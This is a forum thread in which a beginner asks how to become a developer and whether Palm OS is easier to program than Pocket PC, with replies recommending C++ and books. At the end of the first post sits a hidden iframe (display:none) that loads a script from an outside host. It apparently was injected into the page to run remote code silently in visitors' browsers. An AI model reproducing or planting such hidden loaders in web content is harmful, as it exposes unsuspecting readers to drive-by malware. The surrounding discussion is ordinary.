How do I become a developer?

What do all you guys have degrees in? Computer Science? When I look at the codes, I can't understand anything! It's chinese to me. How did you guys start off becoming developers? Is it just a hobby for you, or did you guys actually get degrees in school for computer science or so? What was your majors?

I like challenges, and I'm thinking of going into the Computer Science field. Maybe after that I can understand all this code talk. Are there any sites out there right now that teaches how to read all these codes?

Also, I've heard that the Palm OS is simpler than Pocket PC, and therefore easier to make programs for? Is that true? Does that make the Palm OS better than Pocket PC?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Most people code the Palm OS in C++, although there are many other languages available for Palm OS coding. Pretty much all of the standard apps you will find (including all of the code around this forum) is in C++ though.

C++ is a VERY versitile language, and would definately be the most beneficial to learn, but learning to program is not easy. Still, many people teach themselves. Almost any Comp Science curriculium will give you a strong backbone in C++, but you will probably learn many other languages as well.

As far as the Palm vs. Pocket PC goes, I wouldn't say Palm is easier and simpler from a PROGRAMMING standpoint (of course I haven't really coded anything substantial for Pocket PC), but it is fairly easier as far as functionallity is concerned. The Pocket PC is definately more versitile and thus more "complex."

If you want to learn C++ and/or palm programming, buy a good book on the subject. There ARE plenty of websites devoted to these subjects; however, like I said, it isn't that easy. A book will be more convienient, tell you more, give more examples, etc.

Interesting. In high school I took a computer science course and we did learn c++ a bit. I might major or minor in it, I'm not sure. But I think this is something I might enjoy, a good challenge.

I've heard a couple of people say in this board that in order to make programs compatible with the i300, they do reverse engineering. How is that done. Do you open up a program and look at all the code? Do you then mess with the code until it is compatible? With what programs is this reverse engineering done?

Sorry for all the questions. I find this interesting.
